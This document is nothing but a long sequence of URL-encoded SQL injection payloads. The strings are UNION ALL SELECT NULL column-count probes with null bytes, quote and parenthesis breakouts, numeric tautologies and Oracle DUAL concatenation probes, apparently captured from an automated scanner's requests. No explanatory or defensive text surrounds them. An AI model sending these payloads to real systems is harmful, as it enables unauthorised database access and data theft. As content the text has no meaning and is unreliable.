1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202757%3D2757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208883%3D8883%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%203192%3D3192%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208809%3D8809%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%206187%3D6187%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204534%3D4534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%201321%3D1321%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208584%3D8584%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%205073%3D5073%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204880%3D4880%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202613%3D2613%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207635%3D7635%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201368%3D1368%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201702%3D1702%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207589%3D7589%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207343%3D7343%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201164%3D1164%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%208886%3D8886%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202632%3D2632%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%202504%3D2504%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205986%3D5986%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%201103%3D1103%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204054%3D4054%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%207845%3D7845%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209272%3D9272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204455%3D4455%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205831%3D5831%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%208141%3D8141%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%207077%3D7077%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%205093%3D5093%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204790%3D4790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204451%3D4451%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%205836%3D5836%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201947%3D1947%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%209458%3D9458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%209258%3D9258%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%205520%3D5520%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204660%3D4660%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204475%3D4475%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Mcmu%27%20FROM%20DUAL%20WHERE%204239%3D4239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27qQai%27%20FROM%20DUAL%20WHERE%207485%3D7485%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ciON%27%20FROM%20DUAL%20WHERE%206127%3D6127%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27pvLM%27%20FROM%20DUAL%20WHERE%204508%3D4508%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27xrpn%27%20FROM%20DUAL%20WHERE%206514%3D6514%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27MGDo%27%20FROM%20DUAL%20WHERE%203773%3D3773%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27GEEO%27%20FROM%20DUAL%20WHERE%202025%3D2025%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 